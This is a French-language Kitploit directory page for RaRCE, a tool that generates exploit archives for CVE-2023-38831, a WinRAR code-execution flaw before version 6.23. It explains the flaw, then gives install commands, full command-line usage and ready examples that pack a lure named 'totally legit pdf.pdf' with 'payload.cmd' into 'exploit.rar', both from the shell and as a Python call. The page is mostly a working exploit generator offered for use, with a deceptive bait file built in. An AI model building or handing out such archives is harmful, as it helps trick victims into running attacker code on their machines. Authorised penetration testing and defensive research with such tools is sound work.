Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-38831-RaRCE — Un outil facile à installer et à utiliser pour générer des payloads d'exploitation pour CVE-2023-38831, une RCE WinRAR avant les versions 6.23 | Kitploit
Outils/GitHubGitHub/ignis-sec/cve-2023-38831-rarce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubignis-sec/cve-2023-38831-rarce

CVE-2023-38831-RaRCE

Un outil facile à installer et à utiliser pour générer des payloads d'exploitation pour CVE-2023-38831, une RCE WinRAR avant les versions 6.23

Voir le dépôt
11318il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RaRCE, Générateur d'exploit pour CVE-2023-38831

Contributors Forks Stargazers Issues GitHub

Il s'agit d'un générateur d'exploit facile à installer et à utiliser, polyvalent, pour CVE-2023-38831, une vulnérabilité qui affecte WinRAR versions antérieures à 6.23.

RARLabs WinRAR avant la version 6.23 permet à des attaquants d'exécuter du code arbitraire lorsqu'un utilisateur tente de visualiser un fichier inoffensif dans une archive ZIP. Le problème survient car une archive ZIP peut contenir un fichier inoffensif (comme un fichier .JPG classique) ainsi qu'un dossier portant le même nom que ce fichier, et le contenu du dossier (qui peut inclure du contenu exécutable) est traité lors d'une tentative d'accès uniquement au fichier inoffensif. Cette vulnérabilité a été exploitée dans la nature entre avril et août 2023.

Comment installer

Avec pip

Vous pouvez installer l'outil facilement via pip.

root@kitploit:~
pip install rarce

Ou, vous pouvez l'utiliser à partir du code source.

root@kitploit:~
git clone https://github.com/ignis-sec/CVE-2023-38831-RaRCE
cd CVE-2023-38831-RaRCE
python3 setup.py install

Comment utiliser

root@kitploit:~
usage: rarce [-h] [-v] [-i] [-dt] [-pt PRESERVE_TEMP] bait switch output

Générateur d'exploit pour CVE-2023-38831

arguments positionnels:
  bait                  Chemin vers le fichier leurre à ajouter dans l'archive.
  switch                Chemin vers la charge utile (payload) qui remplacera le fichier leurre lors du double-clic.
  output                Chemin vers le fichier de sortie.

arguments optionnels:
  -h, --help            affiche ce message d'aide et quitte
  -v, --verbose         Sortie détaillée.
  -i, --ignore-path-check
                        Ignorer la vérification de validité du chemin. Si cette option est donnée, rarce peut écraser des fichiers existants dans le paramètre de sortie, et peut créer les dossiers manquants pour le chemin de sortie.
  -dt, --dont-use-tempdir
                        Empêche l'outil de créer un répertoire temporaire lors de la création de l'exploit. À la place, crée les dossiers intermédiaires dans le répertoire de travail actuel.
  -pt PRESERVE_TEMP, --preserve-temp PRESERVE_TEMP
                        Préserve le répertoire temporaire après la création de l'exploit. Sans effet si -dt ou --dont-use-tempdir n'est pas spécifié.

Après installation via pip ou setup.py, vous pouvez utiliser cet outil depuis la ligne de commande. La commande suivante créera le fichier d'exploit pour vous. Lorsqu'un utilisateur double-clique sur le fichier leurre, le script ou l'exécutable de la charge utile s'exécutera à la place.

root@kitploit:~
$ rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"

Vous pouvez également l'utiliser en tant que module exécutable.

root@kitploit:~
python -m rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"

Vous pouvez aussi l'utiliser dans votre code existant.

root@kitploit:~
from rarce import exploit

exploit("totally legit pdf.pdf", "payload.cmd", "exploit.rar")
Télécharger l’outil